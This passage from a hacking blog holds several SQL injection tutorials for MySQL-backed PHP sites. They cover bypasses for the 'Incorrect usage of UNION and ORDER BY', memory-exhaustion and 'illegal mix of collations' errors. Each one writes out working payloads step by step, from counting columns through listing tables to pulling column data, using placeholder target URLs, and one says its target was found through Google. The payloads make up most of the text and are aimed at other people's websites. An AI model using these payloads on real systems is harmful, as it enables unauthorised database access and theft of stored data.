<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieKAq9g_zLVX7vKY1sMEeizTTZ3uh_RQj563t8JFBE6o8jXq4DtSSER2yynPe-zn0pOUvCtBW4OyIPj9KMOt_l8JCdoxD2b5w8YpSNYYfnQBbYuXSDmGeBIo2F84loSIGTN6Hz1CzWt9Ki/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieKAq9g_zLVX7vKY1sMEeizTTZ3uh_RQj563t8JFBE6o8jXq4DtSSER2yynPe-zn0pOUvCtBW4OyIPj9KMOt_l8JCdoxD2b5w8YpSNYYfnQBbYuXSDmGeBIo2F84loSIGTN6Hz1CzWt9Ki/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+7.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now we Can see Our Target is Vulnerable To SQL injection. Now Will Execute our String Based ORDER BY command For Finding Total Number of Columns there.we add our Commands <b>inputsbox=raijee' order by 15-- -</b></span><br />
<span style="font-size: small;">After Executing command of <b>inputsbox=raijee </b>ORDER BY 7-- -<b>&x=11&y=9</b><b> </b>we didn't get any result there and also not any kind of error.and After Executing 8 Columns in Order By Statement it Gives Mysql Error .It means There are 7 Total Number of Columns.</span><br />
<span style="font-size: small;">Now Let's Execute Of UNION SELECT command For Finding Vulnerable Columns.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd5U7zXn2hLAP5ALcCBu2Ul13Dk8y-4PBsXZRSLq6Dj5T0sU6rlPOFaKMQ6Tp7qLFqnYEdDI1qXQnDJxt9EgUDYKB0eoZeUIWgt3RRZKl3KHMe7IaBqj4B9eTuBXoNEp0F33BIQh5k6QUs/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd5U7zXn2hLAP5ALcCBu2Ul13Dk8y-4PBsXZRSLq6Dj5T0sU6rlPOFaKMQ6Tp7qLFqnYEdDI1qXQnDJxt9EgUDYKB0eoZeUIWgt3RRZKl3KHMe7IaBqj4B9eTuBXoNEp0F33BIQh5k6QUs/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+9.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We have got 3,1 are Vulnerable Columns There .Lets Add our Query For Finding Version.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiJMVm0b7nkgFqg5ZdPgzEY013jaFwApcfv-bsSkcoZalPMAFcNqdWx5J8m2Qkpaf1RwiXhAxTRicrdbpr8Fy1-h2C8PLsQfEEHkUiVX_416rxQwR1eMyM2JC1Vxwjg2vOxe09-xGtJB_y/s1600/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Post Parameters Injection Through Live HTTP Headers" border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiJMVm0b7nkgFqg5ZdPgzEY013jaFwApcfv-bsSkcoZalPMAFcNqdWx5J8m2Qkpaf1RwiXhAxTRicrdbpr8Fy1-h2C8PLsQfEEHkUiVX_416rxQwR1eMyM2JC1Vxwjg2vOxe09-xGtJB_y/s400/Post+Parameters+Injection+Through+Live+HTTP+Headers++www.raijee1337.blogspot.com+10.png" title="Post Parameters Injection Through Live HTTP Headers" width="400" /></a></span></div>
<span style="font-size: small;">You Can see the Version Printed there.</span><br />
<span style="font-size: small;">For Getting Tables and Columns and then Extracting DATA from the Tables::</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">READ THIS TUTORIAL</a></span><br />
<span style="font-size: small;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com0tag:blogger.com,1999:blog-5545325473666478334.post-51857015159129461542015-07-08T23:35:00.000-07:002015-08-17T08:41:11.297-07:00Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohoJDzVL8hOnRapDFjbbNuwRamEdF49gHTIOh70ZobWHW-b2rdp3ztIBBmqgBLx4O4_fNj8GrM5tqXhXj2Hr6lU_6d1C6bom6d4swZ_0TjjvxC8Blgh434WAIkDgU8hdCzRCmjB4tgqFM/s1600/Bypassing+Incorrect+Usage+of+UNION+and+++ORDER+BY+-Tutorial+By+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohoJDzVL8hOnRapDFjbbNuwRamEdF49gHTIOh70ZobWHW-b2rdp3ztIBBmqgBLx4O4_fNj8GrM5tqXhXj2Hr6lU_6d1C6bom6d4swZ_0TjjvxC8Blgh434WAIkDgU8hdCzRCmjB4tgqFM/s320/Bypassing+Incorrect+Usage+of+UNION+and+++ORDER+BY+-Tutorial+By+RAi+Jee.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing Incorrect usage of UNION and ORDER BY -Tutorial</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;">In Previous tutorial we Have Discuss about</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/bypassing-error-allowed-memory-size-of.html" target="_blank"><b>Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted</b></a></span><br />
<span style="font-size: small;">Today's our Topic is how can we Bypass the <b>Incorrect Usage of UNION and ORDER BY .</b></span><br />
<span style="font-size: small;">So Lets start our Manual Injection .Our Target Site is Vulnerable To SQL Injection.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Will try to Find the Total number of columns. Hmmm we will use ORDER BY for Counting Columns.</span><br />
<span style="font-size: small;">Here is our Query</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12</b> <b>order by 6--</b> -</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Got ERROR Here !!!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUBMyFHMtueZBhE__0voIgpOzzCnsxC-HXR3t7_REwXTpyyoBYNiUCZqezoo9emR1SBQ4L3dsx8P4wYyqiNfEunrtwL6eqUqMr1og90BEiQTeCmu-b-HNmoWuyVgToytGtcu5p1uTsxSH/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="49" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUBMyFHMtueZBhE__0voIgpOzzCnsxC-HXR3t7_REwXTpyyoBYNiUCZqezoo9emR1SBQ4L3dsx8P4wYyqiNfEunrtwL6eqUqMr1og90BEiQTeCmu-b-HNmoWuyVgToytGtcu5p1uTsxSH/s640/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee.png" width="640" /></a></span></div>
<span style="font-size: small;"><b>You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'order by
5-- -,10' at line 1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Lets Decrease our Columns Count from 6 to 3</span><br />
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12</b> <b>order by 3--</b> -</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Still The Same ERROR !!</span><br />
<span style="font-size: small;"><b>You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'order by 3 -- -,10' at line 1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Try Only One Column For Order by Command</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12</b> <b>order by 1--</b> -</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Got The Same Again<b> </b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'order by 1 -- -,10' at line 1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Again The Same Error as We have Also Put 1 Column for Columns Count.So now We will Try To Guess The Number of Columns by Own.</span><br />
<span style="font-size: small;">So We Will Give Command for UNION SELECT Statement with 3 columns. </span><br />
<span style="font-size: small;">And Our Query Will be</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakSite.com/detail.php?id=12</b> <b>UnION SEleCT 1,2,3--</b> -</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After Executing our Query we Got the Error !!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7zabFb0Y1jt9nq-yzyMsBJdEXdmLfyhupJN93Lc9QWJGGHyXTDeRjSXpXMqCZP1jhyphenhyphenbowW9Dx9GKr6_K2gYrI38rrkXgczGxBKDf6-Z9BK1keC0jXSmvips9pq1iEwziLjxECMB4QTAm/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7zabFb0Y1jt9nq-yzyMsBJdEXdmLfyhupJN93Lc9QWJGGHyXTDeRjSXpXMqCZP1jhyphenhyphenbowW9Dx9GKr6_K2gYrI38rrkXgczGxBKDf6-Z9BK1keC0jXSmvips9pq1iEwziLjxECMB4QTAm/s400/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">We Got Error of <b>"Incorrect usage of UNION and ORDER BY"</b></span><br />
<span style="font-size: small;">hmmm as you can See here we Cannot inject with UNION SELECT Query.</span><br />
<span style="font-size: small;">So we Use <b>Procedure Analyse</b> with <b>Xpath Extractvalue</b> Query to Bypass the Error of <b>Incorrect Usage of UNION and ORDER BY</b>.</span><br />
<span style="font-size: small;">Then Here is Query of <b>Procedure Analyse</b> with <b>Xpath Extractvalue :</b></span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse (extractvalue(0,concat(0x27,0x524169204a6565,0x3a,@@version)),1)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
BinGOOOO The Error is Gone !!!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1wSYBtZEY9JroVUDUUEprzZ8llKie2TjFfaSqL3VTs5Q3ab1Lfr563OX1Nkr2xnEqWntJx0C6EhgQ8W73lSdFOYe8_u0ryxwVFGJhGNTUuo150bUQJi0Q2_m8NjoxvT25ufKQIgyhmNn/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1wSYBtZEY9JroVUDUUEprzZ8llKie2TjFfaSqL3VTs5Q3ab1Lfr563OX1Nkr2xnEqWntJx0C6EhgQ8W73lSdFOYe8_u0ryxwVFGJhGNTUuo150bUQJi0Q2_m8NjoxvT25ufKQIgyhmNn/s400/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-+Tutorial+by+RAi+Jee1.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">As we Have Give Query For VERSION You Can See the Version in above Picture.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Lets Add The Query for Tables : </span><br />
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)-- </b>-</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi50NogXhU6g94Knt9DlouTD18h6fVfvBlPwOBlhBaxGIUSphp1y1FXWwug2Sp8uOMs4-icv0Wt3yVdvyUMg3z_V5AcZpCiwkjud9aKxXRkk-hLInEPMSmO2xJchHhFe7yCLkJPJihr3afP/s1600/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi50NogXhU6g94Knt9DlouTD18h6fVfvBlPwOBlhBaxGIUSphp1y1FXWwug2Sp8uOMs4-icv0Wt3yVdvyUMg3z_V5AcZpCiwkjud9aKxXRkk-hLInEPMSmO2xJchHhFe7yCLkJPJihr3afP/s400/Bypassing+Incorrect+Usage+of+UNION+and+ORDER+BY+-Tutorial+by+RAi+Jee2.png" title="Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">And We Got Tables there but we can see only Some Tables name there.</span><br />
<span style="font-size: small;">For All Tables we will add substr Function in our Query to Get All Other tables from the database.</span><br />
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse (extractvalue(0,concat(0x27,(select substr(group_concat(table_name),10,50) from information_schema.tables where table_schema=database()))),1)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Increase the value of 10,50 in the Query to get other tables in the Database.</span><br />
<span style="font-size: small;">Then Next we have to Get the Column names from the our Targeted Table.</span><br />
<span style="font-size: small;">Here is Query for Getting Column names</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse
(extractvalue(0,concat(0x27,(select group_concat(column_name) from information_schema.tables
where table_name='OUR TABLE_NAME HERE'))),1)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">and The Last Part is Extracting Data from columns.</span><br />
<span style="font-size: small;">Here is The Final Query for Extracting data from Columns</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><b>http://www.FakSite.com/detail.php?id=12 </b>Procedure Analyse
(extractvalue(0,concat(0x27,(select group_concat(OUR_COLUMN_HERE) from OUR_TABLE_NAME_HERE))),1)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </b></span><br />
<span style="font-size: small;"><br /></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-3426113987936677722015-07-07T08:35:00.001-07:002015-08-17T08:36:42.876-07:00Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM5eNb2Qa_RIyWeTFUQXZ99rZQBGdne3Q7h4bG6z-lUjlbTiJLQO6_T88bey0ssJBsXYLDhbSzivoRyR2S9y3oVX2wakNNoDpb35rh5fig1i_oMRSky8rhhuUu-ckxilGk2Vqehc7NyzQl/s1600/Bypassing+Error+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted+-+tutorial+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM5eNb2Qa_RIyWeTFUQXZ99rZQBGdne3Q7h4bG6z-lUjlbTiJLQO6_T88bey0ssJBsXYLDhbSzivoRyR2S9y3oVX2wakNNoDpb35rh5fig1i_oMRSky8rhhuUu-ckxilGk2Vqehc7NyzQl/s320/Bypassing+Error+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted+-+tutorial+RAi+Jee.png" title="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" width="320" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">In This Tutorial You Will Learn How To Bypass the Error Allowed Memory Size of XXXX Bytes Exhaustes.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">While Injecting we came to site which Gives us The Error Of Allowed Memory Size of XXXX Bytes Exhausted when we <b>BUILD </b>our <b>Union Based</b> Query.</span><br />
<span style="font-size: small;">This Error occurs Because of That PHP doesn't Left any allowed Memory.There Are a lots of Possible Causes you can Find on our Chaachu Google.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Hmmm we will start With our normal Injecting.we Found the Site From Google while Injecting and its Vulnerable to SQL Injection..</span><br />
<span style="font-size: small;">First we will Count The Total Number of Columns .</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 order by 5-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">No Error !</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 order by 6-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
Again Site loaded Normally and There is No Error !</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 order by 7-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now We Have Got A Error here <b> </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Unknown column '7' in 'order clause'</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">it Means There are Total 6 Number of Columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Lets Execute our <b>UNION BASED</b> Query. </span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 and 0 Union SELECT 1,2,3,4,5,6-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing <b>UNION BASED</b> Query we Got a Error.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcjrr8xEpiGuSxbmMzHen6_nstj7MSIE05DcqbcbwRyDxsnmAef-W1aiCkL2aYmXgiJl4tzu33WNqL3VlKk0KoQIPbO-SY3R4GDp3fnBZ4DW_iB7A00VjVRas6XwP2juXwtetB1y_q6ly/s1600/bypassing+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted-RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" border="0" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcjrr8xEpiGuSxbmMzHen6_nstj7MSIE05DcqbcbwRyDxsnmAef-W1aiCkL2aYmXgiJl4tzu33WNqL3VlKk0KoQIPbO-SY3R4GDp3fnBZ4DW_iB7A00VjVRas6XwP2juXwtetB1y_q6ly/s640/bypassing+Allowed+Memory+Size+of+XXXX+Bytes+Exhausted-RAi+Jee.png" title="Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted" width="640" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>Fatal error</b>: Allowed memory size of 536870912 bytes exhausted (tried to allocate 534511572 bytes) in <b>/home/XXXX/public_html/cat_ver_producto.php</b> on line <b>166</b></span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">The problem is with the PHP Memory of the Server.We Will use <b>NULL </b>Values instead of putting The Number Columns there to Bypass the Server PHP Memory<b> </b>Usage for our SQL Query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After Putting NULL values Our Query Will Be.</span><br />
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 and 0 Union SELECT null,null,null,null,null,null-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Now The ERROR is GONE!!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">As we are using Null Values we Don't know Which Column is Vulnerable.<b> </b>So to find The Vulnerable Column we Give The Command OF <b>Version() </b>one by one in every Column until it Gives us Any Result.</span><br />
<span style="font-size: small;"><b>http://www.TARGET.com/product.php?id=35 and 0 Union SELECT version(),null,null,null,null,null-- -</b></span><br />
<span style="font-size: small;">After checking The first Column next Check Another and then Another until we Got The Result.In This Way we Will Check All Columns and Will Find our Vulnerable Column.</span><br />
<span style="font-size: small;">When we will Find our Vulnerable Column then we Can put our Query for Tables and Columns in that vulnerable Column.</span><br />
<span style="font-size: small;">if You Don't know How To Get Tables And Columns Then.</span><br />
<span style="font-size: small;">Read From Here. <b> <a href="http://raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">Union Based SQL Injection</a></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com1tag:blogger.com,1999:blog-5545325473666478334.post-31685391566797647742015-06-15T00:24:00.001-07:002015-08-17T08:38:28.518-07:00Bypassing illegal Mix of Collations- Tutorial<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiiqUWT4-PTNQwKM8uXNCqXxQqgIjwd7urPndTy6qA3Sz0gYGnk2wjtlMDmT1z9YplaEFG_GiZpVQlt1Lhp3_8RfaZ372b1rm1q9Ls2I_-MkpS4_FOzE9bKiGq8OOs4kt2ecX9FT36g1Cp/s1600/tt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing illegal Mix of Collations- Tutorial" border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiiqUWT4-PTNQwKM8uXNCqXxQqgIjwd7urPndTy6qA3Sz0gYGnk2wjtlMDmT1z9YplaEFG_GiZpVQlt1Lhp3_8RfaZ372b1rm1q9Ls2I_-MkpS4_FOzE9bKiGq8OOs4kt2ecX9FT36g1Cp/s400/tt.png" title="Bypassing illegal Mix of Collations- Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing illegal Mix of Collations- Tutorial by RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Will Continue our Tutorials About SQL.</span><br />
<span style="font-size: small;">In this Tutorial You Will Learn How to Bypass illegal Mix of Collations.</span><br />
<span style="font-size: small;">Lets start with our Regular SQL injection.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Our Target.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">First we have to Count How Many Columns it have.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 1-- - </b></span><br />
<span style="font-size: small;">No Error !</span><br />
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 4-- - </b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>No Error !</b><b> </b></span><br />
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 6-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Got Error Here.<b><br /></b></span><br />
<span style="font-size: small;"><b>Unknown Column '6' in 'order by'</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b><br /></b>Lets Reduce the Column Count.</span><br />
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 order by 5-- -</b></span><br />
<span style="font-size: small;"><b>No Error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">There are 5 Columns so let's Prepare our <b>UNION SELECT</b> Command<b> </b>and Find Vulnerable Columns<b>.</b><b> </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
We Got 2 and 3.</span><br />
<span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;">Lets try to Get The<b> Tables.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Ooops !! we got<b> Error </b>Here <b>.</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyDI_Jof-1RCp4FIl77Cz2aGD_5Eq7MH4sRJHSc9-gMMXKNx2cmGAe_uQ24Ny4SNAaBq3BkCef858ocQmdfzhMX-Be3RZ5t7tsPieexrSy4Wtz8zccE1WHtFba4trGXUa7orquBErZ1Y_k/s1600/1tu.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing illegal Mix of Collations- Tutorial" border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyDI_Jof-1RCp4FIl77Cz2aGD_5Eq7MH4sRJHSc9-gMMXKNx2cmGAe_uQ24Ny4SNAaBq3BkCef858ocQmdfzhMX-Be3RZ5t7tsPieexrSy4Wtz8zccE1WHtFba4trGXUa7orquBErZ1Y_k/s400/1tu.png" title="Bypassing illegal Mix of Collations- Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Illegal mix of collations for operation 'UNION'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Some Methods which we can use to <b>Bypass</b> <b>illegal mix of collations for operation 'UNION' </b></span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>.1 Using UNCOMPRESS(COMPRESS(our_query_here))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>BYPASSED !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>.2 Using UNHEX(HEX(our_query_here))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
